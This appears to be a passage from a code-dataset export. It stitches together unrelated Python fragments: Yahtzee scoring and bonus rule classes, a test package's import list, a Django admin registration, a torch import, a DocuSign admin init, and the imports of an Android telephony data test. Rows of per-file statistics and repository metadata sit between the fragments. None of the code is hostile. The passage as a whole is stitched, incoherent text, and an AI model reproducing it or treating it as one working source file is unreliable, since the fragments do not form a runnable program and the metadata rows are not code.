----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section):
self.name = name
self.section = section
self.rule_score: Optional[int] = None
def score(self, dice: DiceList) -> None:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
"""
if self._check_rule_not_scored():
self.rule_score = self._score_dice(dice=dice)
else:
raise er.RuleAlreadyScoredError(
f"Rule {self.name} has already been scored."
)
return None
@abstractmethod
def validate(self, dice: DiceList) -> bool:
"""Method to check that a desired pattern
or other trait is present in the given dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
"""
pass # pragma: no cover
@abstractmethod
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
pass # pragma: no cover
def _check_rule_not_scored(self) -> bool:
"""Verifies that the rule has not already been scored.
Returns
-------
rule_not_scored : bool
Whether the rule has been scored or not.
True if not scored, False if scored.
"""
return self.rule_score is None
class ConstantPatternScoringRule(ScoringRule):
"""Generic scoring rule, which looks for a particular pattern,
and has a constant score value.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
score_value : int
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(self, name: str, section: Section, score_value: int):
super().__init__(name=name, section=section)
self.score_value = score_value
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
if self.validate(dice=dice):
return self.score_value
else:
return 0
class VariablePatternScoringRule(ScoringRule):
"""Generic scoring rule, which looks for a particular pattern,
and has a variable score value.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section):
super().__init__(name=name, section=section)
def _score_dice(self, dice: DiceList) -> int:
"""Method to score a given set of dice.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
if self.validate(dice=dice):
return self._scoring_func(dice=dice)
else:
return 0
@abstractmethod
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
pass # pragma: no cover
class ChanceScoringRule(VariablePatternScoringRule):
"""Rules which take any 5 dice.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
"""
def __init__(self, name: str, section: Section = Section.LOWER):
super().__init__(name=name, section=section)
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Scores as the sum of all showing faces.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_all_showing_faces(dice=dice)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Always validates, since Chance can score for any dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since a Chance is just scoring any set of dice,
this will always return `True`.
"""
# Any dice combo is valid
return True
class MultiplesScoringRule(VariablePatternScoringRule):
"""Rules which look for multiple dice with a specific face value.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default UPPER
Section of the scoresheet which the rule belongs to.
face_value : int
Face value needed on a die to be counted in this rule's score.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
face_value : int
Face value needed on a die to be counted in this rule's score.
"""
def __init__(self, name: str, face_value: int, section: Section = Section.UPPER):
super().__init__(name=name, section=section)
self.face_value = face_value
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Scores as the sum of all showing faces which match the given face value.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_matching_faces(dice=dice, face_value=self.face_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Always validates, since Multiples can score for any dice.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since a Multiple will naturally score ``0`` with no matching dice,
this will always return `True`.
"""
# Any dice combo is valid
return True
class NofKindScoringRule(VariablePatternScoringRule):
"""Rules which look for n-of-a-kind of a face value, without explicitly
specifying the desired face value.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
n : int
Number of matching dice needed for this rule - the "n" in "n-of-a-kind".
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
n : int
Number of matching dice needed for this rule - the "n" in "n-of-a-kind".
"""
def __init__(self, name: str, n: int, section: Section = Section.LOWER):
super().__init__(name=name, section=section)
self.n = n
def _scoring_func(self, dice: DiceList) -> int:
"""Method for calculating a dice-dependent score.
Parameters
----------
dice : list of Die
A set of dice to score.
Returns
-------
score : int
The score resulting from the dice, based on the rule.
"""
return _sum_all_showing_faces(dice=dice)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if an n-of-a-kind is present,
or if any m-of-a-kind is present (``m > n``).
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Since m-of-a-kinds (``m > n``) are still valid for a given n,
returns `True` if any m-of-a-kind is present, ``m >= n``.
"""
n_or_more_kind_present = [
vl.validate_nofkind(dice=dice, n=x)
for x in range(self.n, len(dice) + 1)
]
return any(n_or_more_kind_present)
class YahtzeeScoringRule(ConstantPatternScoringRule):
"""Rules which look for a Yahtzee (5-of-a-kind).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_YAHTZEE
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_YAHTZEE
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a Yahtzee (5-of-a-kind) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all dice are the same.
"""
return vl.validate_nofkind(dice=dice, n=len(dice))
class FullHouseScoringRule(ConstantPatternScoringRule):
"""Rules which look for a full house (m-of-a-kind and n-of-a-kind, ``m > n``).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_FULL_HOUSE
The value of the rule if scored with a valid set of dice.
large_n : int, default 3
N for the larger n-of-a-kind required for the full house.
small_n : int, default 2
N for the smaller n-of-a-kind required for the full house.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
large_n : int
N for the larger n-of-a-kind required for the full house.
small_n : int
N for the smaller n-of-a-kind required for the full house.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
large_n: int = 3,
small_n: int = 2,
score_value: int = SCORE_FULL_HOUSE
):
super().__init__(name=name, section=section, score_value=score_value)
self.large_n = large_n
self.small_n = small_n
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a full house (m-of-a-kind and n-of-a-kind, ``m > n``) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if an two n-of-a-kinds are present,
of sizes `large_n` and `small_n`.
"""
return vl.validate_full_house(
dice=dice,
large_n=self.large_n,
small_n=self.small_n
)
class LargeStraightScoringRule(ConstantPatternScoringRule):
"""Rules which look for a large straight (5 dice sequence).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_LARGE_STRAIGHT
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_LARGE_STRAIGHT
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a large straight (5 consecutive values in 5 dice) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all dice are sequential and unique.
"""
return vl.validate_large_straight(dice=dice)
class SmallStraightScoringRule(ConstantPatternScoringRule):
"""Rules which look for a small straight (4 dice sequence).
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
score_value : int, default SCORE_SMALL_STRAIGHT
The value of the rule if scored with a valid set of dice.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
score_value : int
The value of the rule if scored with a valid set of dice.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
score_value: int = SCORE_SMALL_STRAIGHT
):
super().__init__(name=name, section=section, score_value=score_value)
def validate(self, dice: DiceList) -> bool:
"""Method to check that the desired pattern
is present in the given dice.
Validates if a small straight (4 consecutive values in 5 dice) is present.
Parameters
----------
dice : list of Die
A set of dice to check.
Returns
-------
valid_dice : bool
Whether the dice are valid for the given rule or not.
Returns `True` if all-but-one of the dice are sequential and unique.
"""
return vl.validate_small_straight(dice=dice)
def _sum_all_showing_faces(dice: DiceList) -> int:
"""Sums all the showing faces for a set of dice.
Parameters
----------
dice : list of Die
A set of dice to sum.
Returns
-------
dice_sum : int
The sum of all showing faces for the given dice.
"""
return sum([die.showing_face for die in dice if die])
def _sum_matching_faces(dice: DiceList, face_value: int) -> int:
"""Sums all the showing faces which match a given value, for a set of dice.
Parameters
----------
dice : list of Die
A set of dice to sum.
Returns
-------
dice_sum : int
The sum of all showing faces for the given dice
whose showing face matches the given value.
"""
matching_dice = vl.find_matching_dice(dice=dice, face_value=face_value)
return _sum_all_showing_faces(dice=matching_dice)
class BonusRule(ABC):
"""Generic rule for scoring a bonus.
Parameters
----------
name : str
Name to identify the rule.
section : Section
Section of the scoresheet which the rule belongs to.
bonus_value : int
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multipled with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
"""
def __init__(
self,
name: str,
section: Section,
bonus_value: int,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None
):
self.name = name
self.section = section
self.bonus_value = bonus_value
self.counter = counter
self.req_rules = req_rules
self.rule_score: Optional[int] = None
def increment(self, amt: int = 1) -> None:
"""Method to increment the internal counter.
Parameters
----------
amt : int, default 1
Amount by which to increment `counter`.
"""
self.counter += amt
return None
def score(self) -> None:
"""Method to score a given bonus, and update the associated score value.
Raises
------
RuleAlreadyScoredError
If the rule has already been scored.
"""
if self._check_rule_not_scored():
self.rule_score = self._score_bonus()
else:
raise er.RuleAlreadyScoredError(
f"Rule {self.name} has already been scored."
)
return None
@abstractmethod
def _score_bonus(self) -> int:
"""Method to score a bonus rule.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
"""
pass # pragma: no cover
def _check_rule_not_scored(self) -> bool:
"""Verifies that the rule has not already been scored.
Returns
-------
rule_not_scored : bool
Whether or not the rule has been scored yet.
Returns `True` if not scored, `False` if scored.
"""
return self.rule_score is None
class ThresholdBonusRule(BonusRule):
"""Rule for a bonus of which gives points for exceeding a threshold.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default UPPER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_UPPER_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multipled with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
threshold : int, default BONUS_UPPER_THRESHOLD
Threshold to determine if bonus is awarded.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
threshold : int
Threshold to determine if bonus is awarded.
"""
def __init__(
self,
name: str,
section: Section = Section.UPPER,
threshold: int = BONUS_UPPER_THRESHOLD,
bonus_value: int = BONUS_UPPER_SCORE,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=req_rules
)
self.threshold = threshold
def _score_bonus(self) -> int:
"""Method to score a threshold bonus rule.
Scores as the bonus value if the counter meets the threshold, 0 otherwise.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
If `counter` meets `threshold`, return `bonus_value`, otherwise ``0``.
"""
if self.counter >= self.threshold:
return self.bonus_value
else:
return 0
class CountBonusRule(BonusRule):
"""Rule for a bonus which gives a point value per a count of something.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_LOWER_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multipled with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
"""
def __init__(
self,
name: str,
section: Section = Section.LOWER,
bonus_value: int = BONUS_LOWER_SCORE,
counter: int = 0,
req_rules: Optional[List[ScoringRule]] = None,
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=req_rules
)
def _score_bonus(self) -> int:
"""Method to score a count-based bonus.
Scores as a counter times the bonus value.
Returns
-------
score_value : int
Score returned from the bonus scoring logic.
Simply `counter` times `bonus_value`.
"""
return self.counter * self.bonus_value
class YahtzeeBonusRule(CountBonusRule):
"""Counting bonus rule, specifically for additional Yahtzees rolled after
a `YahtzeeScoringRule` has been scored.
Parameters
----------
name : str
Name to identify the rule.
section : Section, default LOWER
Section of the scoresheet which the rule belongs to.
bonus_value : int, default BONUS_YAHTZEE_SCORE
Value used to score the bonus.
Depending on the specific type of bonus, this is either a constant score,
or is multipled with a counter to get the total bonus score.
counter : int
Tally used in scoring the bonus.
Depending on the specific type of bonus, this is either compared against a
threshold value, or is multiplied with the `bonus_value` to get the total
bonus score.
req_rules : list of ScoringRule, optional
Rules which influence the counter.
yahtzee_rule : YahtzeeScoringRule
The Yahtzee rule associated with the bonus.
Used to check if a Yahtzee has already been scored,
which impacts how the bonus is scored.
Attributes
----------
name : str
Name of the rule.
section : Section
Scoresheet section which the rule belongs to.
rule_score : int
Current scored value for the rule.
Returns `None` until the rule is scored.
bonus_value : int
Value used to score the bonus.
counter : int
Tally used in scoring the bonus.
req_rules : list of ScoringRule
Rules which influence the counter.
yahtzee_rule : YahtzeeScoringRule
The Yahtzee rule associated with the bonus.
"""
def __init__(
self,
name: str,
yahtzee_rule: YahtzeeScoringRule,
bonus_value: int = BONUS_YAHTZEE_SCORE,
section: Section = Section.LOWER,
counter: int = 0,
):
super().__init__(
name=name,
section=section,
bonus_value=bonus_value,
counter=counter,
req_rules=None
)
self.yahtzee_rule = yahtzee_rule
| 30.033916 | 86 | 0.598159 | 3,725 | 29,223 | 4.591678 | 0.065235 | 0.043382 | 0.018417 | 0.034378 | 0.815716 | 0.793499 | 0.771223 | 0.752105 | 0.745323 | 0.733571 | 0 | 0.002074 | 0.323512 | 29,223 | 972 | 87 | 30.064815 | 0.863119 | 0.599288 | 0 | 0.577093 | 0 | 0 | 0.011036 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171806 | false | 0.017621 | 0.026432 | 0 | 0.378855 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d8694a124fb127c29a30ed48a89e6bb3e9f14006 | 420 | py | Python | src/tests/Devices/__init__.py | rCorvidae/OrionPI | 1ef5d786d7ae55bf92a8da62d8da28af706f4713 | [
"MIT"
] | null | null | null | src/tests/Devices/__init__.py | rCorvidae/OrionPI | 1ef5d786d7ae55bf92a8da62d8da28af706f4713 | [
"MIT"
] | null | null | null | src/tests/Devices/__init__.py | rCorvidae/OrionPI | 1ef5d786d7ae55bf92a8da62d8da28af706f4713 | [
"MIT"
] | null | null | null | from tests.Devices.Containers.TestContainersReceivingSerialDataAndObserverPattern import TestContainersReceivingSerialDataAndObserverPattern
from .Containers import *
from .Manipulator import *
from .Propulsion import *
from .TestDeviceAbstractObserverPattern import TestDeviceAbstractObserverPattern
from .TestDeviceManagerFactory import TestDeviceManagerFactory
from .TestDeviceWholesale import TestDeviceGrossSeller
| 46.666667 | 140 | 0.902381 | 28 | 420 | 13.535714 | 0.428571 | 0.079156 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069048 | 420 | 8 | 141 | 52.5 | 0.969309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d8d18dfa4c9246833a62794007cf5031f594e953 | 94 | py | Python | visualize/admin.py | craig8196/topicalguide | 8d8a2add7ca5125d6571d66d82235e52be81613f | [
"PostgreSQL"
] | 12 | 2015-03-12T15:33:44.000Z | 2021-01-11T07:57:48.000Z | visualize/admin.py | craig8196/topicalguide | 8d8a2add7ca5125d6571d66d82235e52be81613f | [
"PostgreSQL"
] | 49 | 2015-02-05T12:14:28.000Z | 2016-06-14T22:35:32.000Z | visualize/admin.py | craig8196/topicalguide | 8d8a2add7ca5125d6571d66d82235e52be81613f | [
"PostgreSQL"
] | 11 | 2015-03-25T23:24:12.000Z | 2017-08-02T00:03:10.000Z | from django.contrib import admin
from visualize.models import *
admin.site.register(Dataset)
| 18.8 | 32 | 0.819149 | 13 | 94 | 5.923077 | 0.769231 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.106383 | 94 | 4 | 33 | 23.5 | 0.916667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2b05f4460620cd386aad959f4a1786504f984ce7 | 42 | py | Python | models/SOTAs/NLP/TransFormer.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 2 | 2022-03-29T14:03:16.000Z | 2022-03-29T14:03:54.000Z | models/SOTAs/NLP/TransFormer.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | null | null | null | models/SOTAs/NLP/TransFormer.py | XiaoleiDiao/LowLevelVision-Pipeline-pytorch | 5b04fb75641d02638feccefc2eec4cecf495ced2 | [
"MIT"
] | 1 | 2022-03-29T14:05:16.000Z | 2022-03-29T14:05:16.000Z | import torch
from torch import nn, einsum | 21 | 28 | 0.809524 | 7 | 42 | 4.857143 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 42 | 2 | 28 | 21 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2b335eb452c5cb50ea89edbf56da4aa1f16b3e1c | 43 | py | Python | app/admin/__init__.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | 21 | 2020-05-13T21:08:44.000Z | 2022-02-18T01:32:16.000Z | app/admin/__init__.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | 8 | 2020-11-23T09:28:04.000Z | 2022-02-02T12:04:08.000Z | app/admin/__init__.py | davidgacc/docusign | e63167101656d0066d481844576ce687ea80eb91 | [
"MIT"
] | 26 | 2020-05-12T22:20:01.000Z | 2022-03-09T10:57:27.000Z | from .utils import create_admin_api_client
| 21.5 | 42 | 0.883721 | 7 | 43 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2b5d437aa0615a812e1152adeff19b2576124346 | 95,094 | py | Python | test/connectivity/acts/tests/google/tel/live/TelLiveDataTest.py | Keneral/atools | 055e76621340c7dced125e9de56e2645b5e1cdfb | [
"Unlicense"
] | null | null | null | test/connectivity/acts/tests/google/tel/live/TelLiveDataTest.py | Keneral/atools | 055e76621340c7dced125e9de56e2645b5e1cdfb | [
"Unlicense"
] | null | null | null | test/connectivity/acts/tests/google/tel/live/TelLiveDataTest.py | Keneral/atools | 055e76621340c7dced125e9de56e2645b5e1cdfb | [
"Unlicense"
] | 1 | 2018-02-24T19:13:01.000Z | 2018-02-24T19:13:01.000Z | #!/usr/bin/env python3.4
#
# Copyright 2016 - Google
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test Script for Telephony Pre Check In Sanity
"""
import time
from acts.base_test import BaseTestClass
from queue import Empty
from acts.test_utils.tel.tel_subscription_utils import \
get_subid_from_slot_index
from acts.test_utils.tel.tel_subscription_utils import set_subid_for_data
from acts.test_utils.tel.TelephonyBaseTest import TelephonyBaseTest
from acts.test_utils.tel.tel_defines import DIRECTION_MOBILE_ORIGINATED
from acts.test_utils.tel.tel_defines import DIRECTION_MOBILE_TERMINATED
from acts.test_utils.tel.tel_defines import DATA_STATE_CONNECTED
from acts.test_utils.tel.tel_defines import GEN_2G
from acts.test_utils.tel.tel_defines import GEN_3G
from acts.test_utils.tel.tel_defines import GEN_4G
from acts.test_utils.tel.tel_defines import NETWORK_SERVICE_DATA
from acts.test_utils.tel.tel_defines import NETWORK_SERVICE_VOICE
from acts.test_utils.tel.tel_defines import RAT_2G
from acts.test_utils.tel.tel_defines import RAT_3G
from acts.test_utils.tel.tel_defines import RAT_4G
from acts.test_utils.tel.tel_defines import RAT_FAMILY_LTE
from acts.test_utils.tel.tel_defines import SIM1_SLOT_INDEX
from acts.test_utils.tel.tel_defines import SIM2_SLOT_INDEX
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_NW_SELECTION
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_TETHERING_ENTITLEMENT_CHECK
from acts.test_utils.tel.tel_defines import MAX_WAIT_TIME_WIFI_CONNECTION
from acts.test_utils.tel.tel_defines import TETHERING_MODE_WIFI
from acts.test_utils.tel.tel_defines import WAIT_TIME_AFTER_REBOOT
from acts.test_utils.tel.tel_defines import WAIT_TIME_ANDROID_STATE_SETTLING
from acts.test_utils.tel.tel_defines import WAIT_TIME_BETWEEN_REG_AND_CALL
from acts.test_utils.tel.tel_defines import \
WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING
from acts.test_utils.tel.tel_defines import WAIT_TIME_TETHERING_AFTER_REBOOT
from acts.test_utils.tel.tel_data_utils import airplane_mode_test
from acts.test_utils.tel.tel_data_utils import change_data_sim_and_verify_data
from acts.test_utils.tel.tel_data_utils import data_connectivity_single_bearer
from acts.test_utils.tel.tel_data_utils import ensure_wifi_connected
from acts.test_utils.tel.tel_data_utils import tethering_check_internet_connection
from acts.test_utils.tel.tel_data_utils import wifi_cell_switching
from acts.test_utils.tel.tel_data_utils import wifi_tethering_cleanup
from acts.test_utils.tel.tel_data_utils import wifi_tethering_setup_teardown
from acts.test_utils.tel.tel_test_utils import WifiUtils
from acts.test_utils.tel.tel_test_utils import call_setup_teardown
from acts.test_utils.tel.tel_test_utils import ensure_phones_default_state
from acts.test_utils.tel.tel_test_utils import ensure_phones_idle
from acts.test_utils.tel.tel_test_utils import ensure_network_generation
from acts.test_utils.tel.tel_test_utils import \
ensure_network_generation_for_subscription
from acts.test_utils.tel.tel_test_utils import get_slot_index_from_subid
from acts.test_utils.tel.tel_test_utils import get_network_rat_for_subscription
from acts.test_utils.tel.tel_test_utils import hangup_call
from acts.test_utils.tel.tel_test_utils import multithread_func
from acts.test_utils.tel.tel_test_utils import set_call_state_listen_level
from acts.test_utils.tel.tel_test_utils import setup_sim
from acts.test_utils.tel.tel_test_utils import toggle_airplane_mode
from acts.test_utils.tel.tel_test_utils import toggle_volte
from acts.test_utils.tel.tel_test_utils import verify_http_connection
from acts.test_utils.tel.tel_test_utils import verify_incall_state
from acts.test_utils.tel.tel_test_utils import wait_for_cell_data_connection
from acts.test_utils.tel.tel_test_utils import wait_for_network_rat
from acts.test_utils.tel.tel_test_utils import \
wait_for_voice_attach_for_subscription
from acts.test_utils.tel.tel_test_utils import \
wait_for_data_attach_for_subscription
from acts.test_utils.tel.tel_test_utils import wait_for_wifi_data_connection
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_3g
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_csfb
from acts.test_utils.tel.tel_voice_utils import is_phone_in_call_volte
from acts.test_utils.tel.tel_voice_utils import phone_setup_voice_3g
from acts.test_utils.tel.tel_voice_utils import phone_setup_csfb
from acts.test_utils.tel.tel_voice_utils import phone_setup_voice_general
from acts.test_utils.tel.tel_voice_utils import phone_setup_volte
from acts.test_utils.wifi.wifi_test_utils import WifiEnums
from acts.utils import disable_doze
from acts.utils import enable_doze
from acts.utils import load_config
from acts.utils import rand_ascii_str
